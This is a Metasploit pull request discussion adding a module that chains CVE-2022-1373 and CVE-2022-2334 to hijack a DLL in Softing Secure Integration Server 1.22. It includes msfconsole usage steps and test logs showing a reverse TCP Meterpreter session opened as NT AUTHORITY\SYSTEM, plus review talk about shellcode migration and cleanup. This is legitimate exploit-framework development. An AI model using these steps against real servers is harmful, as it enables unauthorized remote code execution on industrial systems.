Add CVE-2022-1373 and CVE-2022-2334 exploit chain

[ide0x90]

This PR adds a module and related materials for CVE-2022-1373 and CVE-2022-2334 exploit chain against Softing Secure Integration Server 1.22 that was used during Pwn2Own 2022 Miami. This is dependent on #19075.

Verification

List the steps needed to make sure this thing works

1. Start msfconsole
2. Do: use exploit/windows/http/softing_sis_rce
3. Do: set RHOSTS <target_ip>
4. Do: Optional: set SSL true if necessary
5. Do: Optional: set RPORT <target_port> if SSL is set
6. Do: set USERNAME <username> if necessary. Default is admin
7. Do: set PASSWORD <password> if necessary. Default is admin
8. Do: Optional: set SIGNATURE <signature> to use signature authentication. PASSWORD will be ignored if SIGNATURE is set!
9. Do: Optional: set DLLPATH <path_to_custom_dll> to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
10. Do: exploit and get a shell
11. Do: Recommended: delete C:\\Windows\\System32\\wbem\\wbemcomn.dll

Vulnerable Software

Softing Secure Integration Server 1.22

This version is no longer available for download on the vendor's page, but I have a copy of the installer that I can provide.

Test Environment

Widnows Server 2019 Standard x64.

Test run

msf6 > use exploit/windows/http/softing_sis_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
RHOSTS => 192.168.50.119
msf6 exploit(windows/http/softing_sis_rce) > exploit

[*] Started reverse TCP handler on 192.168.50.254:4444
[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 192.168.50.119:8099 - Valid credentials provided
[*] Generating payload DLL...
[*] Created /home/kali/.msf4/local/wbemcomn.dll
[*] Saving configuration...
[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
[*] Sending stage (201798 bytes) to 192.168.50.119
[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
[*] Meterpreter session 1 opened (192.168.50.254:4444 -> 192.168.50.119:50525) at 2024-04-11 19:52:35 +0800
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

TODO

• Figure out why cleanup doesn't work. Manually deleting the planted DLL works, deleting it from within the opened session works, but deleting it with session.fs.file.rm doesn't.

[sjanusz-r7]

If the software only supports x64, is there a reason why we also provide an x86 DLL since this is a DLL hijack attack?

[ide0x90]

No, I suppose there's no reason to have a x86 DLL - removed in afd4b8a

[sjanusz-r7]

We wouldn't have to call this if we add auto-check 👍

[ide0x90]

Added in afd4b8a

[sjanusz-r7]

Since the target is always x64, we can only select the x64 DLL. I think we can remove these lines, and define the target DLL as template_x64_windows.dll

[ide0x90]

Yep, changed in afd4b8a

[sjanusz-r7]

We need to call super in this method

[ide0x90]

Added in afd4b8a

[sjanusz-r7]

The file cleanup functionality can be pulled in with the FileDropper mixin 👍

[ide0x90]

I've tried something in 8d6a206 - let me know if that looks OK!

[sjanusz-r7]

Suggested change

	prepend Msf::Exploit::Remote::AutoCheck

[ide0x90]

Good stuff! Added in afd4b8a

[sjanusz-r7]

If we remove these payload files, we could potentially get an Administrator session from the Framework payload and one of the getsystem techniques would work to elevate to NT AUTHORITY/SYSTEM, and leaving us with less .c files to maintain. The current approach seems like technique 3: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md#3---token-duplication

[ide0x90]

I initially wanted to use Metasploit's C compiler like what was done for https://github.com/rapid7/metasploit-framework/blob/397781f2b1a51b9d8766918f9f7e6ab613f4b8b5/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb, or even just generate a "normal" DLL, but both ways of generating DLLs don't work for this exploit - for the Metasploit C compiler method the DLL needs to be compiled with the .def file, for the "normal" DLL created with msfvenom shells don't spawn, and if compiled with the .def file it spawns 18 shells of questionable stability on every exploit attempt.

I figured mutexes and some migration code would be a good idea and all that was already done before in the code for CVE-2017-8464 anyway, so I just reused that code. I'm sure the .c file could be a lot leaner in this case though (we only want to run shellcode and then migrate it to a more stable process).

[bwatters-r7]

@ide0x90 what's the best way to get the installer from you?

[ide0x90]

@ide0x90 what's the best way to get the installer from you?

I can share the installer over Google Drive, if that's OK?

[bwatters-r7]

@ide0x90 what's the best way to get the installer from you?

I can share the installer over Google Drive, if that's OK?

Yes, please send the link to msfdev@metasploit.com

[ide0x90]

@ide0x90 what's the best way to get the installer from you?

I can share the installer over Google Drive, if that's OK?

Yes, please send the link to msfdev@metasploit.com

Shared the installer

[bwatters-r7]

@ide0x90 what's the best way to get the installer from you?

I can share the installer over Google Drive, if that's OK?

Yes, please send the link to msfdev@metasploit.com

Shared the installer

Got it; thanks!

[bwatters-r7]

Hi there; I've hit a few snags, but I think I have it mostly working- the only catch is that I get an error message when it tries to restore the configuration, reporting Not available in current system state
Is there something I need to do to finish setting up the target?

msf6 exploit(windows/http/softing_sis_rce) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.111:8099 - Found Softing Secure Integration Server 1.22.0.8686
[*] 16b85d3ea1537a32b0e4e86800fa074d
[+] 10.5.132.111:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] 10.5.132.111:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_1036106ee02065ab4c967afd43893333.zip
[-] 10.5.132.111:8099 - {"Message"=>"Not available in current system state."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.111:8099 - Returned code 400, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) > 

[ide0x90]

Darn, I forgot about that error - it's a tricky one that needs a workaround. I sent more stuff to msfdev@metasploit.com with additional info.